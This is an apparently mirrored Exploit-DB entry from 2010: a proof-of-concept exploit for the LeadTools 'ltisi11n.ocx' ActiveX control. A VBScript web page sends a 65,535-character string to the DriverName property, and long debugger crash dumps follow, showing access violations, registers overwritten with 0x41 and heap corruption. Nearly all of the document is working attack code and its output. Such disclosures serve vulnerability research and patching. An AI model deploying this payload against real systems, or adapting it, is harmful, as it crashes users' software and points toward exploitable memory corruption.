LeadTools 11.5.0.9 – ‘ltisi11n.ocx’ DriverName() Access Violation Denial of Service

  • 作者: Matthew Bergin
    日期: 2010-11-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15432/
  • <html>
    Test Exploit Page
    <object classid='clsid:00110050-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
    <script language='vbscript'>
    
    targetFile = "C:\Program Files\Rational\common\ltisi11n.ocx"
    prototype= "Property Let DriverName As String"
    memberName = "DriverName"
    progid = "LEADISISLib.LEADISIS"
    argCount = 1
    
    arg1=String(65535, "A")
    
    target.DriverName = arg1
    
    </script>
    
    
    Exception Code: ACCESS_VIOLATION
    Disasm: 7C80BEB9	MOV [EDX],AL
    
    Seh Chain:
    --------------------------------------------------
    1 	7C839AD8 	KERNEL32.dll
    2 	73352960 	VBSCRIPT.dll
    3 	7C839AD8 	KERNEL32.dll
    
    
    Called From Returns To
    --------------------------------------------------
    KERNEL32.7C80BEB9 ltisi11n.AA1537 
    ltisi11n.AA1537 OLEAUT32.77135CD9 
    OLEAUT32.77135CD9 OLEAUT32.771362E8 
    OLEAUT32.771362E8 ltisi11n.AA64D7 
    ltisi11n.AA64D7 ltisi11n.AA319B 
    ltisi11n.AA319B VBSCRIPT.73303EB7 
    VBSCRIPT.73303EB7 VBSCRIPT.73303E27 
    VBSCRIPT.73303E27 VBSCRIPT.73303397 
    VBSCRIPT.73303397 VBSCRIPT.73303D88 
    VBSCRIPT.73303D88 VBSCRIPT.73311302 
    VBSCRIPT.73311302 VBSCRIPT.733063EE 
    VBSCRIPT.733063EE VBSCRIPT.73306373 
    VBSCRIPT.73306373 VBSCRIPT.73306BA5 
    VBSCRIPT.73306BA5 VBSCRIPT.73306D9D 
    VBSCRIPT.73306D9D VBSCRIPT.73305103 
    VBSCRIPT.73305103 SCROBJ.5CE44396 
    SCROBJ.5CE44396 SCROBJ.5CE4480B 
    SCROBJ.5CE4480B SCROBJ.5CE446A6 
    SCROBJ.5CE446A6 SCROBJ.5CE44643 
    SCROBJ.5CE44643 SCROBJ.5CE44608 
    SCROBJ.5CE44608 1013C93 
    1013C93 1006B0C 
    1006B0C 100332C 
    100332C 1003105 
    1003105 1003076 
    1003076 1002F16 
    1002F16 KERNEL32.7C817077 
    
    
    Registers:
    --------------------------------------------------
    EIP 7C80BEB9 -> AD0013ED
    EAX 0013BD41 -> AD0013ED
    EBX 00AAA760 -> 00AA408F
    ECX 0013CDA4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    EDX 02A73000
    EDI 0000302A
    ESI 02A71F58 -> 00AAA760
    EBP 0013BD6C -> 0013EDB0
    ESP 0013BD48 -> 0000302A -> Uni: *0*0
    
    
    Block Disassembly: 
    --------------------------------------------------
    7C80BEA3	PUSH 7C80BED0
    7C80BEA8	CALL 7C8024D6
    7C80BEAD	AND DWORD PTR [EBP-4],0
    7C80BEB1	MOV ECX,[EBP+C]
    7C80BEB4	MOV EDX,[EBP+8]
    7C80BEB7	MOV AL,[ECX]
    7C80BEB9	MOV [EDX],AL	<--- CRASH
    7C80BEBB	INC ECX
    7C80BEBC	INC EDX
    7C80BEBD	TEST AL,AL
    7C80BEBF	JNZ SHORT 7C80BEB7
    7C80BEC1	OR DWORD PTR [EBP-4],FFFFFFFF
    7C80BEC5	MOV EAX,[EBP+8]
    7C80BEC8	CALL 7C802511
    7C80BECD	RETN 8
    
    
    ArgDump:
    --------------------------------------------------
    EBP+8	02A71FD8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    EBP+12	0013BD7C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    EBP+16	41414141
    EBP+20	41414141
    EBP+24	41414141
    EBP+28	41414141
    
    
    Stack Dump:
    --------------------------------------------------
    13BD48 2A 30 00 00 58 1F A7 02 60 A7 AA 00 48 BD 13 00[....X...`...H...]
    13BD58 7C BD 13 00 AC F1 13 00 D8 9A 83 7C D0 BE 80 7C[................]
    13BD68 00 00 00 00 B0 ED 13 00 37 15 AA 00 D8 1F A7 02[................]
    13BD78 7C BD 13 00 41 41 41 41 41 41 41 41 41 41 41 41[................]
    13BD88 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41[................]
    
    
    
    Exception Code: ACCESS_VIOLATION
    Disasm: 7C919084	MOV ECX,[EBX]
    
    Seh Chain:
    --------------------------------------------------
    1 	7C90E920 	ntdll.dll
    2 	7C90E920 	ntdll.dll
    3 	7C90E920 	ntdll.dll
    4 	7C90E920 	ntdll.dll
    5 	73352960 	VBSCRIPT.dll
    6 	7C839AD8 	KERNEL32.dll
    
    
    Called From Returns To
    --------------------------------------------------
    ntdll.7C919084ntdll.7C96EEA0
    ntdll.7C96EEA0ntdll.7C94B394
    ntdll.7C94B394ntdll.7C918F21
    ntdll.7C918F21ltisi11n.AA69BC 
    ltisi11n.AA69BC ltisi11n.AA7189 
    ltisi11n.AA7189 ltisi11n.AA154C 
    ltisi11n.AA154C OLEAUT32.77135CD9 
    OLEAUT32.77135CD9 OLEAUT32.771362E8 
    OLEAUT32.771362E8 ltisi11n.AA64D7 
    ltisi11n.AA64D7 ltisi11n.AA319B 
    ltisi11n.AA319B VBSCRIPT.73303EB7 
    VBSCRIPT.73303EB7 VBSCRIPT.73303E27 
    VBSCRIPT.73303E27 VBSCRIPT.73303397 
    VBSCRIPT.73303397 VBSCRIPT.73303D88 
    VBSCRIPT.73303D88 VBSCRIPT.73311302 
    VBSCRIPT.73311302 VBSCRIPT.733063EE 
    VBSCRIPT.733063EE VBSCRIPT.73306373 
    VBSCRIPT.73306373 VBSCRIPT.73306BA5 
    VBSCRIPT.73306BA5 VBSCRIPT.73306D9D 
    VBSCRIPT.73306D9D VBSCRIPT.73305103 
    VBSCRIPT.73305103 SCROBJ.5CE44396 
    SCROBJ.5CE44396 SCROBJ.5CE4480B 
    SCROBJ.5CE4480B SCROBJ.5CE446A6 
    SCROBJ.5CE446A6 SCROBJ.5CE44643 
    SCROBJ.5CE44643 SCROBJ.5CE44608 
    SCROBJ.5CE44608 1013C93 
    1013C93 1006B0C 
    1006B0C 100332C 
    100332C 1003105 
    1003105 1003076 
    1003076 1002F16 
    1002F16 KERNEL32.7C817077 
    
    
    Registers:
    --------------------------------------------------
    EIP 7C919084 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    EAX 02A72100 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    EBX 41414141
    ECX 00004141
    EDX 02A70168 -> 00000000
    EDI 41414141
    ESI 02A720F8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    EBP 0013B824 -> 0013B8A8
    ESP 0013B608 -> 0000001C
    
    
    Block Disassembly: 
    --------------------------------------------------
    7C91906D	MOV [EBP-25],AL
    7C919070	LEA EAX,[ESI+8]
    7C919073	MOV EDI,[EAX]
    7C919075	MOV [EBP-1E4],EDI
    7C91907B	MOV EBX,[ESI+C]
    7C91907E	MOV [EBP-164],EBX
    7C919084	MOV ECX,[EBX]	<--- CRASH
    7C919086	CMP ECX,[EDI+4]
    7C919089	JNZ 7C92CC59
    7C91908F	CMP ECX,EAX
    7C919091	JNZ 7C92CC59
    7C919097	PUSH ESI
    7C919098	PUSH DWORD PTR [EBP-1C]
    7C91909B	CALL 7C910684
    7C9190A0	MOV [EBX],EDI
    
    
    ArgDump:
    --------------------------------------------------
    EBP+8	02A70000 -> 000000C8
    EBP+12	50000161
    EBP+16	0000001C
    EBP+20	02A70000 -> 000000C8
    EBP+24	00000000
    EBP+28	02A70000 -> 000000C8
    
    
    Stack Dump:
    --------------------------------------------------
    13B608 1C 00 00 00 00 00 A7 02 01 00 00 00 00 00 00 00[................]
    13B618 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[................]
    13B628 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[................]
    13B638 00 00 00 00 00 00 00 00 41 41 41 41 00 00 00 00[................]
    13B648 00 00 00 00 00 00 00 00 00 60 13 00 00 00 14 00[.........`......]
    
    
    
    Exception Code: BREAKPOINT
    Disasm: 7C90120E	INT3
    
    Seh Chain:
    --------------------------------------------------
    1 	7C90E920 	ntdll.dll
    2 	7C90E920 	ntdll.dll
    3 	7C90E920 	ntdll.dll
    4 	7C839AD8 	KERNEL32.dll
    
    
    Called From Returns To
    --------------------------------------------------
    ntdll.7C90120Fntdll.7C95F38C
    ntdll.7C95F38Cntdll.7C96E507
    ntdll.7C96E507ntdll.7C96F75E
    ntdll.7C96F75Entdll.7C94BC4C
    ntdll.7C94BC4Cntdll.7C927573
    ntdll.7C927573ltisi11n.AA69F4 
    ltisi11n.AA69F4 VBSCRIPT.733015F2 
    VBSCRIPT.733015F2 VBSCRIPT.7331EEE1 
    VBSCRIPT.7331EEE1 VBSCRIPT.7331F192 
    VBSCRIPT.7331F192 VBSCRIPT.7331F632 
    VBSCRIPT.7331F632 VBSCRIPT.73321CB3 
    VBSCRIPT.73321CB3 SCROBJ.5CE448DD 
    SCROBJ.5CE448DD SCROBJ.5CE49EEA 
    SCROBJ.5CE49EEA SCROBJ.5CE49E41 
    SCROBJ.5CE49E41 1013CE7 
    1013CE7 1006B0C 
    1006B0C 100332C 
    100332C 1003105 
    1003105 1003076 
    1003076 1002F16 
    1002F16 KERNEL32.7C817077 
    
    
    Registers:
    --------------------------------------------------
    EIP 7C90120F -> 000B0041
    EAX 02A71EF0 -> 000B0041
    EBX 02A720E4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    ECX 7C91EAD5 -> FF0014C2
    EDX 0013EECE -> EEF4000A
    EDI 000001EC
    ESI 02A71EF0 -> 000B0041
    EBP 0013F0D4 -> 0013F0EC
    ESP 0013F0D0 -> 7C96E139
    
    
    Block Disassembly: 
    --------------------------------------------------
    7C9011FF	TEST BYTE PTR [ESI+10],10
    7C901203	JE 7C90FEF6
    7C901209	POP ESI
    7C90120A	LEAVE
    7C90120B	RETN 4
    7C90120E	INT3
    7C90120F	RETN	<--- CRASH
    7C901210	MOV EDI,EDI
    7C901212	INT3
    7C901213	RETN
    7C901214	MOV EDI,EDI
    7C901216	MOV EAX,[ESP+4]
    7C90121A	INT3
    7C90121B	RETN 4
    7C90121E	MOV EAX,FS:[18]
    
    
    ArgDump:
    --------------------------------------------------
    EBP+8	02A71EF0 -> 000B0041
    EBP+12	02A71EF0 -> 000B0041
    EBP+16	02A70000 -> 000000C8
    EBP+20	02A71EF0 -> 000B0041
    EBP+24	0013F100 -> 0013F174
    EBP+28	7C96E507 -> 3374C084
    
    
    Stack Dump:
    --------------------------------------------------
    13F0D0 39 E1 96 7C EC F0 13 00 8C F3 95 7C F0 1E A7 02[................]
    13F0E0 F0 1E A7 02 00 00 A7 02 F0 1E A7 02 00 F1 13 00[................]
    13F0F0 07 E5 96 7C 00 00 00 00 00 00 A7 02 F8 1E A7 02[................]
    13F100 74 F1 13 00 5E F7 96 7C 00 00 A7 02 F0 1E A7 02[t...^...........]
    13F110 14 F9 96 7C 00 00 A7 02 F8 1E A7 02 60 00 00 40[............`...]
    
    
    
    Exception Code: ACCESS_VIOLATION
    Disasm: 7C96E478	CMP BYTE PTR [EBX+7],FF
    
    Seh Chain:
    --------------------------------------------------
    1 	7C90E920 	ntdll.dll
    2 	7C90E920 	ntdll.dll
    3 	7C839AD8 	KERNEL32.dll
    4 	7C90E920 	ntdll.dll
    5 	7C839AD8 	KERNEL32.dll
    6 	7C839AD8 	KERNEL32.dll
    
    
    Called From Returns To
    --------------------------------------------------
    ntdll.7C96E478ntdll.7C96FA1D
    ntdll.7C96FA1Dntdll.7C94D281
    ntdll.7C94D281KERNEL32.7C834D23 
    KERNEL32.7C834D23 LTKRN11n.2001087F 
    LTKRN11n.2001087F ntdll.7C913A43
    ntdll.7C913A43KERNEL32.7C80C136 
    KERNEL32.7C80C136 KERNEL32.7C80B72F 
    
    
    Registers:
    --------------------------------------------------
    EIP 7C96E478
    EAX FFFFFFF8
    EBX FFFFFFF8
    ECX 00150000 -> 000000C8
    EDX 00150608 -> 7C97E5A0
    EDI 00000000
    ESI 00150000 -> 000000C8
    EBP 00FFFD9C -> 00FFFDEC
    ESP 00FFFD94 -> 00150000
    
    
    Block Disassembly: 
    --------------------------------------------------
    7C96E468	PUSH EBX
    7C96E469	MOV EBX,[EBP+C]
    7C96E46C	TEST EBX,EBX
    7C96E46E	PUSH ESI
    7C96E46F	MOV ESI,[EBP+8]
    7C96E472	JE 7C96E53E
    7C96E478	CMP BYTE PTR [EBX+7],FF	<--- CRASH
    7C96E47C	JNZ SHORT 7C96E4BC
    7C96E47E	CMP BYTE PTR [ESI+586],2
    7C96E485	JNZ SHORT 7C96E48F
    7C96E487	MOV EAX,[ESI+580]
    7C96E48D	JMP SHORT 7C96E491
    7C96E48F	XOR EAX,EAX
    7C96E491	TEST EAX,EAX
    7C96E493	JE 7C96E53E
    
    
    ArgDump:
    --------------------------------------------------
    EBP+8	00150000 -> 000000C8
    EBP+12	FFFFFFF8
    EBP+16	7C96FADC -> Asc: RtlGetUserInfoHeap
    EBP+20	00000000
    EBP+24	00000000
    EBP+28	00000003
    
    
    Stack Dump:
    --------------------------------------------------
    FFFD94 00 00 15 00 01 00 00 00 EC FD FF 00 1D FA 96 7C[................]
    FFFDA4 00 00 15 00 F8 FF FF FF DC FA 96 7C 00 00 00 00[................]
    FFFDB4 00 00 00 00 03 00 00 00 6C FE FF 00 8F 04 44 7E[........l.....D.]
    FFFDC4 F8 FF FF FF 00 00 15 00 5B 21 00 01 02 04 00 00[........[.......]
    FFFDD4 B0 FD FF 00 00 00 00 00 40 FE FF 00 20 E9 90 7C[................]
    
    
    
    ApiLog
    --------------------------------------------------
    
    ***** Installing Hooks *****
    7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
    7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
    Debug String Log
    --------------------------------------------------
    
    HEAP[wscript.exe]: 
    Heap block at 02A71EF0 modified at 02A720E4 past requested size of 1ec